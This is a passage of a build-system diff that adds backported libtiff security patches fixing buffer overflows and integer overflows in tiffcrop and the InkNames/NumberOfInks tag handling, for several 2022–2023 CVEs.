+- new_buff = _TIFFrealloc(sect_buff, sectsize);
++ new_buff = _TIFFrealloc(sect_buff, sectsize + NUM_BUFF_OVERSIZE_BYTES);
+ if (!new_buff)
+ {
+ free (sect_buff);
+- sect_buff = (unsigned char *)_TIFFmalloc(sectsize);
++ sect_buff = (unsigned char *)_TIFFmalloc(sectsize + NUM_BUFF_OVERSIZE_BYTES);
+ }
+ else
+ sect_buff = new_buff;
+@@ -7372,7 +7394,7 @@ createImageSection(uint32 sectsize, unsigned char **sect_buff_ptr)
+ TIFFError("createImageSection", "Unable to allocate/reallocate section buffer");
+ return (-1);
+ }
+- _TIFFmemset(sect_buff, 0, sectsize);
++ _TIFFmemset(sect_buff, 0, sectsize + NUM_BUFF_OVERSIZE_BYTES);
+ }
+ }
+
+@@ -7403,17 +7425,17 @@ processCropSelections(struct image_data *image, struct crop_mask *crop,
+ cropsize = crop->bufftotal;
+ crop_buff = seg_buffs[0].buffer;
+ if (!crop_buff)
+- crop_buff = (unsigned char *)_TIFFmalloc(cropsize);
++ crop_buff = (unsigned char *)_TIFFmalloc(cropsize + NUM_BUFF_OVERSIZE_BYTES);
+ else
+ {
+ prev_cropsize = seg_buffs[0].size;
+ if (prev_cropsize < cropsize)
+ {
+- next_buff = _TIFFrealloc(crop_buff, cropsize);
++ next_buff = _TIFFrealloc(crop_buff, cropsize + NUM_BUFF_OVERSIZE_BYTES);
+ if (! next_buff)
+ {
+ _TIFFfree (crop_buff);
+- crop_buff = (unsigned char *)_TIFFmalloc(cropsize);
++ crop_buff = (unsigned char *)_TIFFmalloc(cropsize + NUM_BUFF_OVERSIZE_BYTES);
+ }
+ else
+ crop_buff = next_buff;
+@@ -7426,7 +7448,7 @@ processCropSelections(struct image_data *image, struct crop_mask *crop,
+ return (-1);
+ }
+
+- _TIFFmemset(crop_buff, 0, cropsize);
++ _TIFFmemset(crop_buff, 0, cropsize + NUM_BUFF_OVERSIZE_BYTES);
+ seg_buffs[0].buffer = crop_buff;
+ seg_buffs[0].size = cropsize;
+
+@@ -7505,17 +7527,17 @@ processCropSelections(struct image_data *image, struct crop_mask *crop,
+ cropsize = crop->bufftotal;
+ crop_buff = seg_buffs[i].buffer;
+ if (!crop_buff)
+- crop_buff = (unsigned char *)_TIFFmalloc(cropsize);
++ crop_buff = (unsigned char *)_TIFFmalloc(cropsize + NUM_BUFF_OVERSIZE_BYTES);
+ else
+ {
+ prev_cropsize = seg_buffs[0].size;
+ if (prev_cropsize < cropsize)
+ {
+- next_buff = _TIFFrealloc(crop_buff, cropsize);
++ next_buff = _TIFFrealloc(crop_buff, cropsize + NUM_BUFF_OVERSIZE_BYTES);
+ if (! next_buff)
+ {
+ _TIFFfree (crop_buff);
+- crop_buff = (unsigned char *)_TIFFmalloc(cropsize);
++ crop_buff = (unsigned char *)_TIFFmalloc(cropsize + NUM_BUFF_OVERSIZE_BYTES);
+ }
+ else
+ crop_buff = next_buff;
+@@ -7528,7 +7550,7 @@ processCropSelections(struct image_data *image, struct crop_mask *crop,
+ return (-1);
+ }
+
+- _TIFFmemset(crop_buff, 0, cropsize);
++ _TIFFmemset(crop_buff, 0, cropsize + NUM_BUFF_OVERSIZE_BYTES);
+ seg_buffs[i].buffer = crop_buff;
+ seg_buffs[i].size = cropsize;
+
+@@ -7641,24 +7663,24 @@ createCroppedImage(struct image_data *image, struct crop_mask *crop,
+ crop_buff = *crop_buff_ptr;
+ if (!crop_buff)
+ {
+- crop_buff = (unsigned char *)_TIFFmalloc(cropsize);
++ crop_buff = (unsigned char *)_TIFFmalloc(cropsize + NUM_BUFF_OVERSIZE_BYTES);
+ if (!crop_buff)
+ {
+ TIFFError("createCroppedImage", "Unable to allocate/reallocate crop buffer");
+ return (-1);
+ }
+- _TIFFmemset(crop_buff, 0, cropsize);
++ _TIFFmemset(crop_buff, 0, cropsize + NUM_BUFF_OVERSIZE_BYTES);
+ prev_cropsize = cropsize;
+ }
+ else
+ {
+ if (prev_cropsize < cropsize)
+ {
+- new_buff = _TIFFrealloc(crop_buff, cropsize);
++ new_buff = _TIFFrealloc(crop_buff, cropsize + NUM_BUFF_OVERSIZE_BYTES);
+ if (!new_buff)
+ {
+ free (crop_buff);
+- crop_buff = (unsigned char *)_TIFFmalloc(cropsize);
++ crop_buff = (unsigned char *)_TIFFmalloc(cropsize + NUM_BUFF_OVERSIZE_BYTES);
+ }
+ else
+ crop_buff = new_buff;
+@@ -7667,7 +7689,7 @@ createCroppedImage(struct image_data *image, struct crop_mask *crop,
+ TIFFError("createCroppedImage", "Unable to allocate/reallocate crop buffer");
+ return (-1);
+ }
+- _TIFFmemset(crop_buff, 0, cropsize);
++ _TIFFmemset(crop_buff, 0, cropsize + NUM_BUFF_OVERSIZE_BYTES);
+ }
+ }
+
+@@ -7965,13 +7987,13 @@ writeCroppedImage(TIFF *in, TIFF *out, struct image_data *image,
+ if (TIFFGetField(in, TIFFTAG_NUMBEROFINKS, &ninks)) {
+ TIFFSetField(out, TIFFTAG_NUMBEROFINKS, ninks);
+ if (TIFFGetField(in, TIFFTAG_INKNAMES, &inknames)) {
+- int inknameslen = strlen(inknames) + 1;
++ int inknameslen = (int)strlen(inknames) + 1;
+ const char* cp = inknames;
+ while (ninks > 1) {
+ cp = strchr(cp, '\0');
+ if (cp) {
+ cp++;
+- inknameslen += (strlen(cp) + 1);
++ inknameslen += ((int)strlen(cp) + 1);
+ }
+ ninks--;
+ }
+@@ -8356,13 +8378,13 @@ rotateContigSamples32bits(uint16 rotation, uint16 spp, uint16 bps, uint32 width,
+ }
+ else /* If we have a full buffer's worth, write it out */
+ {
+- bytebuff1 = (buff2 >> 56);
++ bytebuff1 = (uint8)(buff2 >> 56);
+ *dst++ = bytebuff1;
+- bytebuff2 = (buff2 >> 48);
++ bytebuff2 = (uint8)(buff2 >> 48);
+ *dst++ = bytebuff2;
+- bytebuff3 = (buff2 >> 40);
++ bytebuff3 = (uint8)(buff2 >> 40);
+ *dst++ = bytebuff3;
+- bytebuff4 = (buff2 >> 32);
++ bytebuff4 = (uint8)(buff2 >> 32);
+ *dst++ = bytebuff4;
+ ready_bits -= 32;
+
+@@ -8431,12 +8453,13 @@ rotateImage(uint16 rotation, struct image_data *image, uint32 *img_width,
+ return (-1);
+ }
+
+- if (!(rbuff = (unsigned char *)_TIFFmalloc(buffsize)))
++ /* Add 3 padding bytes for extractContigSamplesShifted32bits */
++ if (!(rbuff = (unsigned char *)_TIFFmalloc(buffsize + NUM_BUFF_OVERSIZE_BYTES)))
+ {
+- TIFFError("rotateImage", "Unable to allocate rotation buffer of %1u bytes", buffsize);
++ TIFFError("rotateImage", "Unable to allocate rotation buffer of %1u bytes", buffsize + NUM_BUFF_OVERSIZE_BYTES);
+ return (-1);
+ }
+- _TIFFmemset(rbuff, '\0', buffsize);
++ _TIFFmemset(rbuff, '\0', buffsize + NUM_BUFF_OVERSIZE_BYTES);
+
+ ibuff = *ibuff_ptr;
+ switch (rotation)
+@@ -8964,13 +8987,13 @@ reverseSamples32bits (uint16 spp, uint16 bps, uint32 width,
+ }
+ else /* If we have a full buffer's worth, write it out */
+ {
+- bytebuff1 = (buff2 >> 56);
++ bytebuff1 = (uint8)(buff2 >> 56);
+ *dst++ = bytebuff1;
+- bytebuff2 = (buff2 >> 48);
++ bytebuff2 = (uint8)(buff2 >> 48);
+ *dst++ = bytebuff2;
+- bytebuff3 = (buff2 >> 40);
++ bytebuff3 = (uint8)(buff2 >> 40);
+ *dst++ = bytebuff3;
+- bytebuff4 = (buff2 >> 32);
++ bytebuff4 = (uint8)(buff2 >> 32);
+ *dst++ = bytebuff4;
+ ready_bits -= 32;
+
+@@ -9061,12 +9084,13 @@ mirrorImage(uint16 spp, uint16 bps, uint16 mirror, uint32 width, uint32 length,
+ {
+ case MIRROR_BOTH:
+ case MIRROR_VERT:
+- line_buff = (unsigned char *)_TIFFmalloc(rowsize);
++ line_buff = (unsigned char *)_TIFFmalloc(rowsize + NUM_BUFF_OVERSIZE_BYTES);
+ if (line_buff == NULL)
+ {
+- TIFFError ("mirrorImage", "Unable to allocate mirror line buffer of %1u bytes", rowsize);
++ TIFFError ("mirrorImage", "Unable to allocate mirror line buffer of %1u bytes", rowsize + NUM_BUFF_OVERSIZE_BYTES);
+ return (-1);
+ }
++ _TIFFmemset(line_buff, '\0', rowsize + NUM_BUFF_OVERSIZE_BYTES);
+
+ dst = ibuff + (rowsize * (length - 1));
+ for (row = 0; row < length / 2; row++)
+@@ -9098,11 +9122,12 @@ mirrorImage(uint16 spp, uint16 bps, uint16 mirror, uint32 width, uint32 length,
+ }
+ else
+ { /* non 8 bit per sample data */
+- if (!(line_buff = (unsigned char *)_TIFFmalloc(rowsize + 1)))
++ if (!(line_buff = (unsigned char *)_TIFFmalloc(rowsize + NUM_BUFF_OVERSIZE_BYTES)))
+ {
+ TIFFError("mirrorImage", "Unable to allocate mirror line buffer");
+ return (-1);
+ }
++ _TIFFmemset(line_buff, '\0', rowsize + NUM_BUFF_OVERSIZE_BYTES);
+ bytes_per_sample = (bps + 7) / 8;
+ bytes_per_pixel = ((bps * spp) + 7) / 8;
+ if (bytes_per_pixel < (bytes_per_sample + 1))
+@@ -9114,7 +9139,7 @@ mirrorImage(uint16 spp, uint16 bps, uint16 mirror, uint32 width, uint32 length,
+ {
+ row_offset = row * rowsize;
+ src = ibuff + row_offset;
+- _TIFFmemset (line_buff, '\0', rowsize);
++ _TIFFmemset (line_buff, '\0', rowsize + NUM_BUFF_OVERSIZE_BYTES);
+ switch (shift_width)
+ {
+ case 1: if (reverseSamples16bits(spp, bps, width, src, line_buff))
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2022-3597_3626_3627.patch b/meta/recipes-multimedia/libtiff/files/CVE-2022-3597_3626_3627.patch
new file mode 100644
index 0000000000..18a4b4e0ff
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2022-3597_3626_3627.patch
@@ -0,0 +1,123 @@
+From f7c06c395daf1b2c52ab431e00db2d9fc2ac993e Mon Sep 17 00:00:00 2001
+From: Su Laus <sulau@freenet.de>
+Date: Tue, 10 May 2022 20:03:17 +0000
+Subject: [PATCH] tiffcrop: Fix issue #330 and some more from 320 to 349
+
+Upstream-Status: Backport [import from debian http://security.debian.org/debian-security/pool/updates/main/t/tiff/tiff_4.1.0+git191117-2~deb10u7.debian.tar.xz ]
+CVE: CVE-2022-3597 CVE-2022-3626 CVE-2022-3627
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+
+Origin: https://gitlab.com/libtiff/libtiff/-/commit/e319508023580e2f70e6e626f745b5b2a1707313
+Origin: https://gitlab.com/libtiff/libtiff/-/commit/8fe3735942ea1d90d8cef843b55b3efe8ab6feaf
+Origin: https://gitlab.com/libtiff/libtiff/-/commit/bad48e90b410df32172006c7876da449ba62cdba
+Origin: https://gitlab.com/libtiff/libtiff/-/commit/236b7191f04c60d09ee836ae13b50f812c841047
+Reviewed-by: Sylvain Beucler <beuc@debian.org>
+Last-Update: 2023-01-17
+
+---
+ tools/tiffcrop.c | 50 ++++++++++++++++++++++++++++++++++++++++--------
+ 1 file changed, 42 insertions(+), 8 deletions(-)
+
+diff --git a/tools/tiffcrop.c b/tools/tiffcrop.c
+index c923920..a0789a3 100644
+--- a/tools/tiffcrop.c
++++ b/tools/tiffcrop.c
+@@ -103,7 +103,12 @@
+ * selects which functions dump data, with higher numbers selecting
+ * lower level, scanline level routines. Debug reports a limited set
+ * of messages to monitor progess without enabling dump logs.
+- */
++ *
++ * Note 1: The (-X|-Y), -Z, -z and -S options are mutually exclusive.
++ * In no case should the options be applied to a given selection successively.
++ * Note 2: Any of the -X, -Y, -Z and -z options together with other PAGE_MODE_x options
++ * such as -H, -V, -P, -J or -K are not supported and may cause buffer overflows.
++ */
+
+ static char tiffcrop_version_id[] = "2.4.1";
+ static char tiffcrop_rev_date[] = "03-03-2010";
+@@ -176,12 +181,12 @@ extern int getopt(int argc, char * const argv[], const char *optstring);
+ #define ROTATECW_270 32
+ #define ROTATE_ANY (ROTATECW_90 | ROTATECW_180 | ROTATECW_270)
+
+-#define CROP_NONE 0
+-#define CROP_MARGINS 1
+-#define CROP_WIDTH 2
+-#define CROP_LENGTH 4
+-#define CROP_ZONES 8
+-#define CROP_REGIONS 16
++#define CROP_NONE 0 /* "-S" -> Page_MODE_ROWSCOLS and page->rows/->cols != 0 */
++#define CROP_MARGINS 1 /* "-m" */
++#define CROP_WIDTH 2 /* "-X" */
++#define CROP_LENGTH 4 /* "-Y" */
++#define CROP_ZONES 8 /* "-Z" */
++#define CROP_REGIONS 16 /* "-z" */
+ #define CROP_ROTATE 32
+ #define CROP_MIRROR 64
+ #define CROP_INVERT 128
+@@ -323,7 +328,7 @@ struct crop_mask {
+ #define PAGE_MODE_RESOLUTION 1
+ #define PAGE_MODE_PAPERSIZE 2
+ #define PAGE_MODE_MARGINS 4
+-#define PAGE_MODE_ROWSCOLS 8
++#define PAGE_MODE_ROWSCOLS 8 /* for -S option */
+
+ #define INVERT_DATA_ONLY 10
+ #define INVERT_DATA_AND_TAG 11
+@@ -754,6 +759,12 @@ static char* usage_info[] = {
+ " The four debug/dump options are independent, though it makes little sense to",
+ " specify a dump file without specifying a detail level.",
+ " ",
++"Note 1: The (-X|-Y), -Z, -z and -S options are mutually exclusive.",
++" In no case should the options be applied to a given selection successively.",
++" ",
++"Note 2: Any of the -X, -Y, -Z and -z options together with other PAGE_MODE_x options",
++" such as - H, -V, -P, -J or -K are not supported and may cause buffer overflows.",
++" ",
+ NULL
+ };
+
+@@ -2112,6 +2123,27 @@ void process_command_opts (int argc, char *argv[], char *mp, char *mode, uint32
+ /*NOTREACHED*/
+ }
+ }
++ /*-- Check for not allowed combinations (e.g. -X, -Y and -Z, -z and -S are mutually exclusive) --*/
++ char XY, Z, R, S;
++ XY = ((crop_data->crop_mode & CROP_WIDTH) || (crop_data->crop_mode & CROP_LENGTH)) ? 1 : 0;
++ Z = (crop_data->crop_mode & CROP_ZONES) ? 1 : 0;
++ R = (crop_data->crop_mode & CROP_REGIONS) ? 1 : 0;
++ S = (page->mode & PAGE_MODE_ROWSCOLS) ? 1 : 0;
++ if (XY + Z + R + S > 1) {
++ TIFFError("tiffcrop input error", "The crop options(-X|-Y), -Z, -z and -S are mutually exclusive.->exit");
++ exit(EXIT_FAILURE);
++ }
++
++ /* Check for not allowed combination:
++ * Any of the -X, -Y, -Z and -z options together with other PAGE_MODE_x options
++ * such as -H, -V, -P, -J or -K are not supported and may cause buffer overflows.
++. */
++ if ((XY + Z + R > 0) && page->mode != PAGE_MODE_NONE) {
++ TIFFError("tiffcrop input error",
++ "Any of the crop options -X, -Y, -Z and -z together with other PAGE_MODE_x options such as - H, -V, -P, -J or -K is not supported and may cause buffer overflows..->exit");
++ exit(EXIT_FAILURE);
++ }
++
+ } /* end process_command_opts */
+
+ /* Start a new output file if one has not been previously opened or
+@@ -2384,6 +2416,7 @@ main(int argc, char* argv[])
+ exit (-1);
+ }
+
++ /* Crop input image and copy zones and regions from input image into seg_buffs or crop_buff. */
+ if (crop.selections > 0)
+ {
+ if (processCropSelections(&image, &crop, &read_buff, seg_buffs))
+@@ -2400,6 +2433,7 @@ main(int argc, char* argv[])
+ exit (-1);
+ }
+ }
++ /* Format and write selected image parts to output file(s). */
+ if (page.mode == PAGE_MODE_NONE)
+ { /* Whole image or sections not based on output page size */
+ if (crop.selections > 0)
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2022-3599.patch b/meta/recipes-multimedia/libtiff/files/CVE-2022-3599.patch
new file mode 100644
index 0000000000..b3232d9002
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2022-3599.patch
@@ -0,0 +1,277 @@
+From 01bca7e6f608da7696949fca6acda78b9935ba19 Mon Sep 17 00:00:00 2001
+From: Su_Laus <sulau@freenet.de>
+Date: Tue, 30 Aug 2022 16:56:48 +0200
+Subject: [PATCH] Revised handling of TIFFTAG_INKNAMES and related
+
+Upstream-Status: Backport [import from debian http://security.debian.org/debian-security/pool/updates/main/t/tiff/tiff_4.1.0+git191117-2~deb10u7.debian.tar.xz ]
+CVE: CVE-2022-3599 CVE-2022-4645 CVE-2023-30774
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+
+Origin: https://gitlab.com/libtiff/libtiff/-/commit/e813112545942107551433d61afd16ac094ff246
+Reviewed-by: Sylvain Beucler <beuc@debian.org>
+Last-Update: 2023-01-17
+
+ TIFFTAG_NUMBEROFINKS value
+
+In order to solve the buffer overflow issues related to TIFFTAG_INKNAMES and related TIFFTAG_NUMBEROFINKS value, a revised handling of those tags within LibTiff is proposed:
+
+Behaviour for writing:
+ `NumberOfInks` MUST fit to the number of inks in the `InkNames` string.
+ `NumberOfInks` is automatically set when `InkNames` is set.
+ If `NumberOfInks` is different to the number of inks within `InkNames` string, that will be corrected and a warning is issued.
+ If `NumberOfInks` is not equal to samplesperpixel only a warning will be issued.
+
+Behaviour for reading:
+ When reading `InkNames` from a TIFF file, the `NumberOfInks` will be set automatically to the number of inks in `InkNames` string.
+ If `NumberOfInks` is different to the number of inks within `InkNames` string, that will be corrected and a warning is issued.
+ If `NumberOfInks` is not equal to samplesperpixel only a warning will be issued.
+
+This allows the safe use of the NumberOfInks value to read out the InkNames without buffer overflow
+
+This MR will close the following issues: #149, #150, #152, #168 (to be checked), #250, #269, #398 and #456.
+
+It also fixes the old bug at http://bugzilla.maptools.org/show_bug.cgi?id=2599, for which the limitation of `NumberOfInks = SPP` was introduced, which is in my opinion not necessary and does not solve the general issue.
+
+---
+ libtiff/tif_dir.c | 120 ++++++++++++++++++++++++-----------------
+ libtiff/tif_dir.h | 2 +
+ libtiff/tif_dirinfo.c | 2 +-
+ libtiff/tif_dirwrite.c | 5 ++
+ libtiff/tif_print.c | 4 ++
+ 5 files changed, 83 insertions(+), 50 deletions(-)
+
+diff --git a/libtiff/tif_dir.c b/libtiff/tif_dir.c
+index 39aeeb4..9d8267a 100644
+--- a/libtiff/tif_dir.c
++++ b/libtiff/tif_dir.c
+@@ -29,6 +29,7 @@
+ * (and also some miscellaneous stuff)
+ */
+ #include "tiffiop.h"
++# include <inttypes.h>
+
+ /*
+ * These are used in the backwards compatibility code...
+@@ -137,32 +138,30 @@ setExtraSamples(TIFF* tif, va_list ap, uint32* v)
+ }
+
+ /*
+- * Confirm we have "samplesperpixel" ink names separated by \0. Returns
++ * Count ink names separated by \0. Returns
+ * zero if the ink names are not as expected.
+ */
+-static uint32
+-checkInkNamesString(TIFF* tif, uint32 slen, const char* s)
++static uint16
++countInkNamesString(TIFF *tif, uint32 slen, const char *s)
+ {
+- TIFFDirectory* td = &tif->tif_dir;
+- uint16 i = td->td_samplesperpixel;
++ uint16 i = 0;
++ const char *ep = s + slen;
++ const char *cp = s;
+
+ if (slen > 0) {
+- const char* ep = s+slen;
+- const char* cp = s;
+- for (; i > 0; i--) {
++ do {
+ for (; cp < ep && *cp != '\0'; cp++) {}
+ if (cp >= ep)
+ goto bad;
+ cp++; /* skip \0 */
+- }
+- return ((uint32)(cp-s));
++ i++;
++ } while (cp < ep);
++ return (i);
+ }
+ bad:
+ TIFFErrorExt(tif->tif_clientdata, "TIFFSetField",
+- "%s: Invalid InkNames value; expecting %d names, found %d",
+- tif->tif_name,
+- td->td_samplesperpixel,
+- td->td_samplesperpixel-i);
++ "%s: Invalid InkNames value; no NUL at given buffer end location %"PRIu32", after %"PRIu16" ink",
++ tif->tif_name, slen, i);
+ return (0);
+ }
+
+@@ -476,13 +475,61 @@ _TIFFVSetField(TIFF* tif, uint32 tag, va_list ap)
+ _TIFFsetFloatArray(&td->td_refblackwhite, va_arg(ap, float*), 6);
+ break;
+ case TIFFTAG_INKNAMES:
+- v = (uint16) va_arg(ap, uint16_vap);
+- s = va_arg(ap, char*);
+- v = checkInkNamesString(tif, v, s);
+- status = v > 0;
+- if( v > 0 ) {
+- _TIFFsetNString(&td->td_inknames, s, v);
+- td->td_inknameslen = v;
++ {
++ v = (uint16) va_arg(ap, uint16_vap);
++ s = va_arg(ap, char*);
++ uint16 ninksinstring;
++ ninksinstring = countInkNamesString(tif, v, s);
++ status = ninksinstring > 0;
++ if(ninksinstring > 0 ) {
++ _TIFFsetNString(&td->td_inknames, s, v);
++ td->td_inknameslen = v;
++ /* Set NumberOfInks to the value ninksinstring */
++ if (TIFFFieldSet(tif, FIELD_NUMBEROFINKS))
++ {
++ if (td->td_numberofinks != ninksinstring) {
++ TIFFErrorExt(tif->tif_clientdata, module,
++ "Warning %s; Tag %s:\n Value %"PRIu16" of NumberOfInks is different from the number of inks %"PRIu16".\n -> NumberOfInks value adapted to %"PRIu16"",
++ tif->tif_name, fip->field_name, td->td_numberofinks, ninksinstring, ninksinstring);
++ td->td_numberofinks = ninksinstring;
++ }
++ } else {
++ td->td_numberofinks = ninksinstring;
++ TIFFSetFieldBit(tif, FIELD_NUMBEROFINKS);
++ }
++ if (TIFFFieldSet(tif, FIELD_SAMPLESPERPIXEL))
++ {
++ if (td->td_numberofinks != td->td_samplesperpixel) {
++ TIFFErrorExt(tif->tif_clientdata, module,
++ "Warning %s; Tag %s:\n Value %"PRIu16" of NumberOfInks is different from the SamplesPerPixel value %"PRIu16"",
++ tif->tif_name, fip->field_name, td->td_numberofinks, td->td_samplesperpixel);
++ }
++ }
++ }
++ }
++ break;
++ case TIFFTAG_NUMBEROFINKS:
++ v = (uint16)va_arg(ap, uint16_vap);
++ /* If InkNames already set also NumberOfInks is set accordingly and should be equal */
++ if (TIFFFieldSet(tif, FIELD_INKNAMES))
++ {
++ if (v != td->td_numberofinks) {
++ TIFFErrorExt(tif->tif_clientdata, module,
++ "Error %s; Tag %s:\n It is not possible to set the value %"PRIu32" for NumberOfInks\n which is different from the number of inks in the InkNames tag (%"PRIu16")",
++ tif->tif_name, fip->field_name, v, td->td_numberofinks);
++ /* Do not set / overwrite number of inks already set by InkNames case accordingly. */
++ status = 0;
++ }
++ } else {
++ td->td_numberofinks = (uint16)v;
++ if (TIFFFieldSet(tif, FIELD_SAMPLESPERPIXEL))
++ {
++ if (td->td_numberofinks != td->td_samplesperpixel) {
++ TIFFErrorExt(tif->tif_clientdata, module,
++ "Warning %s; Tag %s:\n Value %"PRIu32" of NumberOfInks is different from the SamplesPerPixel value %"PRIu16"",
++ tif->tif_name, fip->field_name, v, td->td_samplesperpixel);
++ }
++ }
+ }
+ break;
+ case TIFFTAG_PERSAMPLE:
+@@ -887,34 +934,6 @@ _TIFFVGetField(TIFF* tif, uint32 tag, va_list ap)
+ if (fip->field_bit == FIELD_CUSTOM) {
+ standard_tag = 0;
+ }
+-
+- if( standard_tag == TIFFTAG_NUMBEROFINKS )
+- {
+- int i;
+- for (i = 0; i < td->td_customValueCount; i++) {
+- uint16 val;
+- TIFFTagValue *tv = td->td_customValues + i;
+- if (tv->info->field_tag != standard_tag)
+- continue;
+- if( tv->value == NULL )
+- return 0;
+- val = *(uint16 *)tv->value;
+- /* Truncate to SamplesPerPixel, since the */
+- /* setting code for INKNAMES assume that there are SamplesPerPixel */
+- /* inknames. */
+- /* Fixes http://bugzilla.maptools.org/show_bug.cgi?id=2599 */
+- if( val > td->td_samplesperpixel )
+- {
+- TIFFWarningExt(tif->tif_clientdata,"_TIFFVGetField",
+- "Truncating NumberOfInks from %u to %u",
+- val, td->td_samplesperpixel);
+- val = td->td_samplesperpixel;
+- }
+- *va_arg(ap, uint16*) = val;
+- return 1;
+- }
+- return 0;
+- }
+
+ switch (standard_tag) {
+ case TIFFTAG_SUBFILETYPE:
+@@ -1092,6 +1111,9 @@ _TIFFVGetField(TIFF* tif, uint32 tag, va_list ap)
+ case TIFFTAG_INKNAMES:
+ *va_arg(ap, char**) = td->td_inknames;
+ break;
++ case TIFFTAG_NUMBEROFINKS:
++ *va_arg(ap, uint16 *) = td->td_numberofinks;
++ break;
+ default:
+ {
+ int i;
+diff --git a/libtiff/tif_dir.h b/libtiff/tif_dir.h
+index e7f0667..7cad679 100644
+--- a/libtiff/tif_dir.h
++++ b/libtiff/tif_dir.h
+@@ -117,6 +117,7 @@ typedef struct {
+ /* CMYK parameters */
+ int td_inknameslen;
+ char* td_inknames;
++ uint16 td_numberofinks; /* number of inks in InkNames string */
+
+ int td_customValueCount;
+ TIFFTagValue *td_customValues;
+@@ -174,6 +175,7 @@ typedef struct {
+ #define FIELD_TRANSFERFUNCTION 44
+ #define FIELD_INKNAMES 46
+ #define FIELD_SUBIFD 49
++#define FIELD_NUMBEROFINKS 50
+ /* FIELD_CUSTOM (see tiffio.h) 65 */
+ /* end of support for well-known tags; codec-private tags follow */
+ #define FIELD_CODEC 66 /* base of codec-private tags */
+diff --git a/libtiff/tif_dirinfo.c b/libtiff/tif_dirinfo.c
+index fbfaaf0..bf7de70 100644
+--- a/libtiff/tif_dirinfo.c
++++ b/libtiff/tif_dirinfo.c
+@@ -104,7 +104,7 @@ tiffFields[] = {
+ { TIFFTAG_SUBIFD, -1, -1, TIFF_IFD8, 0, TIFF_SETGET_C16_IFD8, TIFF_SETGET_UNDEFINED, FIELD_SUBIFD, 1, 1, "SubIFD", (TIFFFieldArray*) &tiffFieldArray },
+ { TIFFTAG_INKSET, 1, 1, TIFF_SHORT, 0, TIFF_SETGET_UINT16, TIFF_SETGET_UNDEFINED, FIELD_CUSTOM, 0, 0, "InkSet", NULL },
+ { TIFFTAG_INKNAMES, -1, -1, TIFF_ASCII, 0, TIFF_SETGET_C16_ASCII, TIFF_SETGET_UNDEFINED, FIELD_INKNAMES, 1, 1, "InkNames", NULL },
+- { TIFFTAG_NUMBEROFINKS, 1, 1, TIFF_SHORT, 0, TIFF_SETGET_UINT16, TIFF_SETGET_UNDEFINED, FIELD_CUSTOM, 1, 0, "NumberOfInks", NULL },
++ { TIFFTAG_NUMBEROFINKS, 1, 1, TIFF_SHORT, 0, TIFF_SETGET_UINT16, TIFF_SETGET_UNDEFINED, FIELD_NUMBEROFINKS, 1, 0, "NumberOfInks", NULL },
+ { TIFFTAG_DOTRANGE, 2, 2, TIFF_SHORT, 0, TIFF_SETGET_UINT16_PAIR, TIFF_SETGET_UNDEFINED, FIELD_CUSTOM, 0, 0, "DotRange", NULL },
+ { TIFFTAG_TARGETPRINTER, -1, -1, TIFF_ASCII, 0, TIFF_SETGET_ASCII, TIFF_SETGET_UNDEFINED, FIELD_CUSTOM, 1, 0, "TargetPrinter", NULL },
+ { TIFFTAG_EXTRASAMPLES, -1, -1, TIFF_SHORT, 0, TIFF_SETGET_C16_UINT16, TIFF_SETGET_UNDEFINED, FIELD_EXTRASAMPLES, 0, 1, "ExtraSamples", NULL },
+diff --git a/libtiff/tif_dirwrite.c b/libtiff/tif_dirwrite.c
+index 9e4d306..a2dbc3b 100644
+--- a/libtiff/tif_dirwrite.c
++++ b/libtiff/tif_dirwrite.c
+@@ -677,6 +677,11 @@ TIFFWriteDirectorySec(TIFF* tif, int isimage, int imagedone, uint64* pdiroff)
+ if (!TIFFWriteDirectoryTagAscii(tif,&ndir,dir,TIFFTAG_INKNAMES,tif->tif_dir.td_inknameslen,tif->tif_dir.td_inknames))
+ goto bad;
+ }
++ if (TIFFFieldSet(tif, FIELD_NUMBEROFINKS))
++ {
++ if (!TIFFWriteDirectoryTagShort(tif, &ndir, dir, TIFFTAG_NUMBEROFINKS, tif->tif_dir.td_numberofinks))
++ goto bad;
++ }
+ if (TIFFFieldSet(tif,FIELD_SUBIFD))
+ {
+ if (!TIFFWriteDirectoryTagSubifd(tif,&ndir,dir))
+diff --git a/libtiff/tif_print.c b/libtiff/tif_print.c
+index a073794..a9f05a7 100644
+--- a/libtiff/tif_print.c
++++ b/libtiff/tif_print.c
+@@ -402,6 +402,10 @@ TIFFPrintDirectory(TIFF* tif, FILE* fd, long flags)
+ }
+ fputs("\n", fd);
+ }
++ if (TIFFFieldSet(tif, FIELD_NUMBEROFINKS)) {
++ fprintf(fd, " NumberOfInks: %d\n",
++ td->td_numberofinks);
++ }
+ if (TIFFFieldSet(tif,FIELD_THRESHHOLDING)) {
+ fprintf(fd, " Thresholding: ");
+ switch (td->td_threshholding) {
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2022-3970.patch b/meta/recipes-multimedia/libtiff/files/CVE-2022-3970.patch
new file mode 100644
index 0000000000..ea70827cbe
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2022-3970.patch
@@ -0,0 +1,45 @@
+From 7e87352217d1f0c77eee7033ac59e3aab08532bb Mon Sep 17 00:00:00 2001
+From: Even Rouault <even.rouault@spatialys.com>
+Date: Tue, 8 Nov 2022 15:16:58 +0100
+Subject: [PATCH] TIFFReadRGBATileExt(): fix (unsigned) integer overflow on
+
+Upstream-Status: Backport [import from debian http://security.debian.org/debian-security/pool/updates/main/t/tiff/tiff_4.1.0+git191117-2~deb10u7.debian.tar.xz ]
+CVE: CVE-2022-3970
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+
+Origin: https://gitlab.com/libtiff/libtiff/-/commit/227500897dfb07fb7d27f7aa570050e62617e3be
+Reviewed-by: Sylvain Beucler <beuc@debian.org>
+Last-Update: 2023-01-17
+
+ strips/tiles > 2 GB
+
+Fixes https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=53137
+
+---
+ libtiff/tif_getimage.c | 8 ++++----
+ 1 file changed, 4 insertions(+), 4 deletions(-)
+
+diff --git a/libtiff/tif_getimage.c b/libtiff/tif_getimage.c
+index 96ab146..0b90dcc 100644
+--- a/libtiff/tif_getimage.c
++++ b/libtiff/tif_getimage.c
